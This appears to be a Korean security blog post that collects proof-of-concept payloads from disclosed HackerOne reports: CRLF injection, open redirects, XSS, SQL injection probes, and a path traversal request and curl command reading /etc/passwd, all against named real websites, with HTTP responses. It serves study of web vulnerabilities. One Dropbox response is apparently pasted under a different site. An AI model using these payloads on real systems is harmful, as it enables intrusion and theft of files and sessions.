기본 콘텐츠로 건너뛰기

HackerOne Vulnerability Analysis 1





이 문서는  HackerOne 에서  제출된 많은 보고서들을 토대로 핵심 Payload만 요약하여 직접 작성하였습니다.

Link : https://hackerone.com/





Vulnerabilities list

1. CRLF Injection
2. Open Redirection 
3. Cross-Site-Scripting
4. SQL-Injection
5. Path Traversal








PoC
http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;
https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com;
HTTP Response:
HTTP/1.1 302 Moved Temporarily
...
Location: http://myshopify.com/xxcrlftest
Set-Cookie:test=test;domain=.myshopify.com;

PoC:
https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com
HTTP Response:
HTTP/1.1 301 Moved Permanently
...
Location: http://engineeringblog.yelp.com/xxcrlftest
Set-Cookie: test=test;domain=.yelp.com

PoC
(Chrome, Internet Explorer)
http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
HTTP Response:
Location: https://gratipay.com/\r
Set-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;\r\n

PoC
https://s.mail.ru/test%0dSet-Cookie:crlf=injection;domain=.mail.ru;

PoC
https://corp.mail.ru/%0dSet-Cookie:crlf=injection;domain=.mail.ru;

PoC
http://my.mail.ru/crlftest%0dSet-Cookie:crlf=inj6;domain=.mail.ru;path=/;/
http://m.my.mail.ru/crlftest%0dSet-Cookie:crlf=inj4;domain=.mail.ru;path=/;/
https://mir.mail.ru/crlftest%0dSet-Cookie:crlf=inj3;domain=.mail.ru;path=/;/
https://blog.mail.ru/crlftest%0dSet-Cookie:crlf=inj5;domain=.mail.ru;path=/;/
https://blogs.mail.ru/crlftest%0dSet-Cookie:crlf=inj7;domain=.mail.ru;path=/;/
https://www.video.mail.ru/crlftest%0dSet-Cookie:crlf=inj2;domain=.mail.ru;path=/;/

PoC
http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;
HTTP Response:
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 07:58:47 GMT\r\n
Server: Apache\r\n
Location: https://doc.owncloud.org/#\r                      < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n

PoC
https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;
HTTP Response:
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 10:28:01 GMT\r\n
Server: Apache\r\n
Strict-Transport-Security: max-age=63072000\r\n
X-Xss-Protection: 1; mode=block\r\n
Location: https://doc.owncloud.org/api/#\r                       < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n

PoC
https://touch.lady.mail.ru/%0aSet-Cookie:csrftoken=x;domain=.mail.ru;
HTTP Response:
HTTP/1.1 301 Moved Permanently
...
Location: https://lady.mail.ru/
Set-Cookie:csrftoken=x;domain=.mail.ru;

PoC (for any browser other than FireFox):
https://monitor.sjc.dropbox.com/crlf%0dSet-Cookie:test=test;domain=.dropbox.com
HTTP Response:
HTTP/1.1 301 Moved Permanently\r\n
Date: Sat, 13 Dec 2014 10:05:12 GMT\r\n
Server: Apache\r\n
Location: https://monitor.dropbox.com//crlf/r < injectoin
Set-Cookie:test=test;domain=.dropbox.com\r\n

Result:
Creating a cookie-param "test=test" on *.dropbox.com

PoC 
http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io
HTTP/1.1 301 Moved Permanently\r\n
Date: Sat, 13 Dec 2014 10:05:12 GMT\r\n
Server: Apache\r\n
Location: https://monitor.dropbox.com//crlf/r < injectoin
Set-Cookie:test=test;domain=.dropbox.com\r\n

Result:
Creating a cookie-param "test=test" on *.dropbox.com

PoC (any browser except FireFox):
http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b
HTTP Response:
HTTP/1.1 302 Found
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 16 Jun 2016 09:59:15 GMT
Location: https://account-global.ubnt.com/index.html?         <= injection \r
Set-Cookie:crlf=injection;domain=.ubnt.com;
This vulnerability could be used in combination with others. For example, XSS via Cookie, session fixation or bypass Double-Submit Cookie CSRF protection.

PoC (FireFox)
http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
After sending the request through FireFox this query is saved in cache and using a small trick can be made to work it in another browser.
PoC (Chrome)
Make sure you send this request after FireFox and previous http response contained the header X-Cache: HIT
http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
HTTP Response
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://news.starbucks.com/
Content-Length:35
X-XSS-Protection:0

23
<svg onload=alert(document.domain)>
0

Chrome PoC


http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
FireFox PoC
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
HTTP Response
HTTP/1.1 301 Content-moved
Date: Tue, 20 Dec 2016 08:40:11 GMT
Server: WebServer
X-Original-link: /%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
X-XSS-Protection: 0
Location: //x:1
Content-Type: text/html
Content-Length: 98

<script>alert(document.domain)</script>
Content-Length: 0
X-OneLinkServiceType: onelink.fcgi






Open Redirection 


PoC
https://giwi.com/main.action#//google.com/

PoC
https://skyliner.io//blackfan.ru/
https://qa.skyliner.io//blackfan.ru/
HTTP Response
HTTP/1.1 301 Moved Permanently
Content-Length: 0
Connection: close
Date: Wed, 24 Aug 2016 17:30:39 GMT
Location: //blackfan.ru

PoC
http://rabota.mail.ru//blackfan.ru//
HTTP Response:
HTTP/1.1 301 Moved Permanently
Server: nginx/1.7.10
Date: Mon, 07 Sep 2015 07:24:30 GMT
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=60
Location: //blackfan.ru

PoC
Reproduction Steps:
https://m.uber.com//youtube.com/%2F..
HTTP Response:
HTTP/1.1 303 See Other
...
Location: //youtube.com/%2F../

PoC
인증되지 않은 사용자 만 해당 (Mpop 쿠키 없음)
https://ml.money.mail.ru//blackfan.ru
HTTP 응답
HTTP/1.1 302
...
Location: //blackfan.ru?dmr_refresh=1

PoC
http://zaption.com///www.google.com/%2f%2e%2e
HTTP/1.1 303 See Other
Location://www.google.com/%2f%2e%2e

PoC
https://apps.shopify.com//blackfan.ru/
HTTP Response
HTTP/1.1 301 Moved Permanently
Server: Cowboy
Date: Wed, 17 Aug 2016 11:48:27 GMT
Connection: close
Location: //blackfan.ru




PoC

https://admin.c2fo.com///www.google.com/%2e%2e
HTTP Response
HTTP Request:
GET ///www.google.com/%2e%2e HTTP/1.1
Host: admin.c2fo.com

HTTP Response:
Location: //www.google.com/%2e%2e/

PoC
Chrome, IE:
https://cooking.lady.mail.ru/%09/blackfan.ru

Chrome, IE, FireFox:
https://cooking.lady.mail.ru/%5cblackfan.ru
HTTP Response
HTTP/1.1 301 Moved Permanently
...
Location: / /blackfan.ru/
HTTP/1.1 301 Moved Permanently
...
Location: /\blackfan.ru/


PoC:
Open link and wait a full load
https://verkkopalvelu.lahitapiola.fi//blackfan.ru/%2f../e2/kotivakuutus/vakuutuslaskuri/

PoC
https://http2.cloudflare.com/%5cblackfan.ru
HTTP Response
HTTP/1.1 301 Moved Permanently
...
location: /\blackfan.ru/

PoC

https://keybase.io//www.google.com/%2f%2e%2e
HTTP Response:
HTTP/1.1 303 See Other
...
Location: //www.google.com/%2f%2e%2e/

PoChttps://dev.twitter.com/https:/%5cblackfan.ru/
HTTP Response:
HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru

Description: Open Redirect
Domain: idp.fr.cloud.gov
Steps To Reproduce:
Open URL:
https://idp.fr.cloud.gov//blackfan.ru/..;/css
HTTP Response
HTTP/1.1 302 Found
...
Location: //blackfan.ru/..;/css/
...





Cross-Site-Scripting

PoC (Internet Explorer, Edge):


https://blackfan.ru/x?r=https://forum.owncloud.org/<svg/onload=alert(document.domain)>/%252e%252e

PoC (Internet Explorer):


http://blackfan.ru/x?r=http://support.my.com/"-alert(document.domain)-"/%252e%252e/games
HTTP Response:
   "continue":    "http://support.my.com/"-alert(document.domain)-"/%2e%2e/games",
   "signup_method":     "email,phone",
   "signup_continue":   "ht

PoC
Internet Explorer에서 열기
(리디렉션 버그는 올바른 요청을 생성하는 데 사용되므로 "bf.am/x?r="스크립트가 필요합니다)
http://bf.am/x?r=https://mrgs.mail.ru/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/
결과 :
<input type="hidden" name="target" value="/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/">

PoC
http://blackfan.ru/x?r=http://odnoklassniki.ru%252f%253f%2523%22*alert(document.domain)*"
http://blackfan.ru/x?r=http://ok.ru%252f%253f%2523%22*alert(document.domain)*"
HTTP Response:


<script type="text/javascript">
...
host:"http://odnoklassniki.ru/?#"*alert(document.cookie)*""
...
</script>

PoC
http://bf.am/x?r=https://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/
결과 :
<meta property="og:url" content="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" />
...
<div id="shareToolbox" class="b-likes__inner" data-url="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" data-title="Страница не найдена - Ошибка 404

PoC
Internet Explorer 용 XSS
http://bf.am/x?r=https://strife.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://wf.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://aw.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://aa.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://pw.mail.ru/xxx"><svg/%252e%252e/onload=alert%26lpar;document.cookie%26rpar;>/%252e%252e/

PoC Internet Explorer
https://blackfan.ru/x?r=https://realty.mail.ru/%22--%3e%3csvg/onload=alert(document.domain)%3e/%252e%252e
Request
GET /"--><svg/onload=alert(document.domain)>/.. HTTP/1.1
Host: realty.mail.ru
Connection: close

PoC
https://apps.wordpress.com/support/&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
https://labs.spotify.com/&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
https://news.spotify.com/tr/&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;

PoC (FireFox):
https://pokerist.mail.ru/%3Cscript%3Ealert(document.domain)%3C/script%3E
https://pokerist.mail.ru/%3Csvg%20onload=alert(document.domain)%3E
HTTP Response:
<h1>Error 404</h1>
<p>Unable to resolve the request "<script>alert(document.domain)</script>".</p>
<h1>Error 404</h1>
<p>The system is unable to find the requested action "<svg onload=alert(document.domain)>".</p>

PoC
  1. <a href="//bf.am">Welcome</a> <-- <a> 태그 공격

PoC
https://controlsyou.quora.com/'-alert(document.domain)-'
HTTP Response
<script type="text/javascript">
...
ga('set', 'dimension1', 'board-'-alert(document.domain)-'');
ga('set', 'dimension2', 'False');
ga('set', 'dimension3', 'False');});});</script>

PoC
Open URL in FireFox:
https://theacademy.upserve.com/roles/?%22%3E%3Cscript//src=data&colon;,alert(location)//
HTTP Request
GET /roles/?%22%3E%3Cscript//src=data&colon;,alert(location)// HTTP/1.1
Host: theacademy.upserve.com
HTTP Response
<a class="category dropdown-item name-sort sorting-desc" href="/roles/?"><script//src=data&colon;,alert(location)//&orderby=name&order=DESC">Name</a>
<a class="category dropdown-item views-sort " href="/roles/?"><script//src=data&colon;,alert(location)//&orderby=views&order=DESC" >Views</a>
<a class="category dropdown-item duration-sort " href="/roles/?"><script//src=data&colon;,alert(location)//&orderby=duration&order=DESC">Duration</a>

PoC
Open URL in Internet Explorer.
This vulnerability only works in Internet Explorer (and possibly in Edge), since it is necessary to send a Request-URI without a URL Encode, which is only possible in this browser via redirect.
https://blackfan.ru/x?r=https://stage-go.wepay.com/%22onerror=%22alert(document.domain)%22/%252e%252e/index.php/%22/index.php
HTTP Request
GET /"onerror="alert(document.domain)"/%2e%2e/index.php/"/index.php HTTP/1.1
Host: stage-go.wepay.com
HTTP Response
<img src="https://stage-go.wepay.com/"onerror="alert(document.domain)"/%2e%2e/index.php/"/index.php/uploads/847_WePay_20170809-700.png" alt="Mans" class="hero--image"> 

Poc
https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
HTTP Response:
HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...


<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>.  If not click the link.

PoC (Internet Explorer и, может быть, Edge)
https://blackfan.ru/x?r=https://ibank.qiwi.ru/xx'-alert(document.domain)-'xx/%252e%252e/web_banking/session_timeout.jsf
blackfan.ru/x?r простой скрипт перенаправления, необходимый для формирования Request-URI и обхода XSS фильтра IE.
HTTP Response
    <script type="text/javascript">
//<![CDATA[
var lang='ru';var calendarStartYear='';var colorPickerImage="/web_banking/javax.faces.resource/color.png.jsf?ln=images";var contextPath='/xx'-alert(document.domain)-'xx/%2e%2e/web_banking';
//]]>
</script>

PoC
Открыть ссылку с помощью Internet Explorer
https://blackfan.ru/x?r=https://contact-sys.com/xxx'-alert(document.domain)],<!--/%252e%252e
HTTP Request
GET /xxx'-alert(document.domain)],<!--/%2e%2e HTTP/1.1
Host: contact-sys.com
HTTP Response
<script type="text/javascript">var routes=['xxx\\'-alert(1)],<!--','%2e%2e'],


PoC (IE)

http://blackfan.ru/x?r=https://sms.qiwi.ru/bo/reset/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/


Open URL in Internet Explorer (tested on IE 11)
https://blackfan.ru/x?r=https://allhiphop.vanillacommunities.com/xxx%22-alert(document.domain)-%22xxx/%252e%252e/
blackfan.ru/x - a simple redirection script that is needed to send a request-path without a urlencode.
HTTP Request
GET /xxx"-alert(123)-"xxx/%2e%2e/ HTTP/1.1
Host: allhiphop.vanillacommunities.com
HTTP Response
<script>
   COMSCORE.beacon({
      c1:2,
      c2:6685975,
      c3:"",
      c4:"app6.cl411.vanilladev.com/xxx"-alert(123)-"xxx/%2e%2e/",
      c5:"",
      c6:"",
      c15:""
   });
   </script>

HTTP Request
GET /?xx HTTP/1.1
Host: wknd.rocketbank.ruX-Forwarded-Host: cacheattack'"><script>alert(document.domain)</script>


HTTP Response
         <link rel="next" href="http://cacheattack'"><script>alert(document.domain)</script>/friends/"> 
         <link rel="canonical" href="http://cacheattack'"><script>alert(document.domain)</script>/">  



     <meta content="203852619785949" property="fb:app_id" >
     <meta content="website" property="og:type" >
     <meta content="http://cacheattack'"><script>alert(document.domain)</script>/" property="og:url" >


HTTP Request
GET /?xx HTTP/1.1
Host: meta.discourse.org
X-Forwarded-Host: cacheattack'"><script>alert(document.domain)</script>
HTTP Response
<link rel="preload" 
   href="https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2?https://cacheattack'">
   <script>alert(document.domain)</script>
   &2&v=4.7.0" as="font" type="font/woff2" crossorigin />
<style>
  @font-face {
    font-family: 'FontAwesome';
    src: url('https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2?https://cacheattack'">
    <script>alert(document.domain)</script>
    &2&v=4.7.0') format('woff2'),
         url('https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-ba0c59deb5450f5cb41b3f93609ee2d0d995415877ddfa223e8a8a7533474f07.woff?https://cacheattack&#39;&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;2&v=4.7.0') format('woff');
  }
</style>





SQL-Injection

PoC
  1. 참, substr (version (), 1,10) = 'PostgreSQL', 결과 : Peruttu의 Ilmoittaumisesi
http://viestinta.lahitapiola.fi/webApp/sijoitustalous_peruutus?regId=253685182&locId=78976538+and+case+when+substr(version(),1,10)=%27PostgreSQL%27+then+true+else+cast(version()%20as%20numeric)=1+end
  1. FALSE, substr (version (), 1,10) = 'PostgreXXX', 결과 : 오류가 발생했습니다
http://viestinta.lahitapiola.fi/webApp/sijoitustalous_peruutus?regId=253685182&locId=78976538+and+case+when+substr(version(),1,10)=%27PostgreXXX%27+then+true+else+cast(version()%20as%20numeric)=1+end

PoC
POST /webApp/oma_conf HTTP/1.1
Host: viestinta.lahitapiola.fi
Content-Type: application/x-www-form-urlencoded
Content-Length: 1131

ctx=%3Cctx+lang%3D%22en%22+date%3D%222016-11-12T17%3A33%3A06Z%22+_target%3D%22web%22+webApp-id%3D%22235234841%22+_folderModel%3D%22nmsRecipient%22%3E%3CuserInfo+datakitInDatabase%3D%22true%22+homeDir%3D%22%22+instanceLocale%3D%22en-US%22+locale%3D%22en-US%22+login%3D%22webapp%22+loginCS%3D%22Web+applications+agent+%28webapp%29%22+loginId%3D%223290%22+noConsoleCnx%3D%22true%22+orgUnitId%3D%220%22+theme%3D%22%22+timezone%3D%22Europe%2FHelsinki%22+xmlns%3ASOAP-ENV%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22+xmlns%3Ans%3D%22urn%3Axtk%3Asession%22+xmlns%3Axsd%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema%22+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema-instance%22%3E%3Clogin-right+right%3D%22admin%22%2F%3E%3C%2FuserInfo%3E%3Ctimezone+current%3D%22Europe%2FHelsinki%22+changed%3D%22false%22%2F%3E%3Cvars%3E%3CcustomerId%3E0%3C%2FcustomerId%3E%3Caction%3Ein%3C%2Faction%3E
%3Cemail%3Etest%40test.ru' and substr(version(),1,10) = 'PostgreSQL' and '1%3C%2Femail%3E
%3C%2Fvars%3E%3CactivityHistory%3E%3Cactivity+name%3D%22page%22%2F%3E%3C%2FactivityHistory%3E%3C%2Fctx%3E&userAction=next&transition=
Steps to reproduce
  1. Open http://viestinta.lahitapiola.fi/webApp/oma_conf
  2. Fill in the form value ' and substr(version(),1,10) = 'PostgreSQL' and '1
  3. Result Kiitos tilauksestasi!
  4. Fill in the form value ' and substr(version(),1,10) = 'PostgreXXX' and '1
  5. Result An error occurred.

 ' and (@@version)=1 and '1'='1
HTTP Request
POST /index.php/LK/reset_password HTTP/1.1
Host: lk.contact-sys.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: session=rljb13keot8u1s09nqrf9f8be1; _ym_uid=1472633286349849091; _ym_isad=2; _ga=GA1.2.258776393.1472633287; LKlang=RU
Connection: close
Content-Length: 66

FP_POINT_CODE=test&FP_LK_USER_LOGIN=' and (@@version)=1 and '1'='1
HTTP Response
{"msg_code":-1,"msg_text":"\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f 
nvarchar \"Microsoft SQL Server 2014 (SP2) (KB3171021) - 12.0.5000.0 (X64)   Jun 17 2016 19:14:09   Copyright (c) Microsoft Corporation  Enterprise Edition: Core-based Licensing (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) 
\" \u0432 \u0442\u0438\u043f \u0434\u0430\u043d\u043d\u044b\u0445 int"}

Уязвимый параметр: limit
POST█████ HTTP/1.1
Host: contact-sys.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 59

country_code=RU&send_rec_type=1&action=index&term=&limit=10+INTO+@A
Ответ
{"error":"SQLSTATE[21000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns","errorCode":"SQLSTATE[21000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns"





Path Traversal

Description
Reading files outside the web root via path traversal
PoC
GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
Host: dev-nightly.ubnt.com
curl "https://dev-nightly.ubnt.com/..\..\..\etc\passwd"

댓글

이 블로그의 인기 게시물

Juice Shop XSS [ Dom based XSS ]

Juice Shop XSS [ Dom based XSS ] Search 입력란에 악성 스크립트를 넣어 XSS 취약점을 진단합니다. Payload :  <iframe src="javascript:alert(`xss`)">   다음과 같이 이는 < , > 는 &lt; , &gt; 로 특수문자를 필터링하지 않기에 XSS 에 취약합니다.

JSON Injection

JSON Injection [Description] JSON은 XML과 같이 주입공격에 취약합니다. 따라서 공격자는 JSON 엔터티에 임의의 요소나 속성을 삽입함으로써 , JSON Injection 이 가능합니다. 우리의 목표는 더 저렴한 가격으로 가격을 조작하여 물품을 구매하는것입니다. [그림1]   [그림1]   물품 가격 출력 그림. [그림1] 같이 N/A , Newark,Chicago 의 물품 가격이 존재합니다. 우리는 이러한 물품 가격을 조작하여 좀 더 저렴한 가격으로 구매가 가능한지에 대한 취약점 여부를 진단합니다.    [그림2] [그림2]  가격 조작 그림. [그림2] 와 같이 "N/A" 가격의 금액을 원래 금액인 $600 달러에서 $1달러로 변경하고 "Newark, Chicago" 가격의 금액을 원래 금액인 $300 달러에서 $1달러로 변경 후 전송하여 취약점을 진단합니다. [그림3] [그림3]  가격 조작 성공 금액 원래 금액인 가격을 $1달러로 변경 후 , 전송 시 [그림3] 과 같이 성공적으로 가격이 변경되는것을 확인할수있습니다.  [그림4] [그림4]  조작한 두 개의 물품을 모두 체크하여 구매한 그림. [그림3] 에서 조작한 금액을 모두 체크하여 전송 시 [그림4] 와 같이  성공적으로 구매가  가능합니다. [impact] 공격자는 JSON 주입 공격을 통해 물품 가격을 임의로 수정하여 원하는 금액에 구매가 가능합니다.